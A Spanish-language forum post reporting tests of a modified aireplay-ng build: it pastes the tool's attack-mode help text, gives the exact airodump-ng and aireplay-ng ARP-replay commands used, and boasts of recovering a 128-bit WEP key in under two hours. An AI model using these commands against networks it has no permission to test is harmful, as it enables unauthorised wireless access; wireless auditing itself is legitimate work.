Gracias a thefkboss ...
pruebas realizadas en mi apposteo las capturas como me pediste ...
no sé si habre usado bien la nueva opcion del buffer ciclico .. pero nunca habia visto subir los data como en esta ocasion ..
la ayuda ..
[root@rh3nt0n aircrack-ng-0.6]# ./aireplay-ng
Aireplay-ng 0.6 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
Thanks to: recursive and Hirte for de code
MOTHERFUCKER EDITION V 0.1
By thefkboss
usage: aireplay-ng <options> <replay interface>
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
-g value : change ring buffer size (default: 8)
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
attack modes (Numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
airodump-ng ./airodump-ng -c 11 -b <BSSID> -w <file> ath0
aireplay-ng ./aireplay-ng -3 -g 180 -r file.cap -b <bssid_ap> -h <cliente_ap> ath0
he usado la opcion '-r' por que en primera instancia no me acorde agregar la opcion -g y ya tenia algunos ARP capturados ..
las imagenes hablan por si mismas
GRACIAS thefkboss
PD: en lo que he tardao en escribir en post ..lleva 350.000 iv's y una hora y cuarto snnifando ..
y lleva almacenadas cerca de 12.000 respuestas ARP
saludos
PD :
keyfound de 128 bits en 1 hora 50 minutos IMPRESIONANTE!!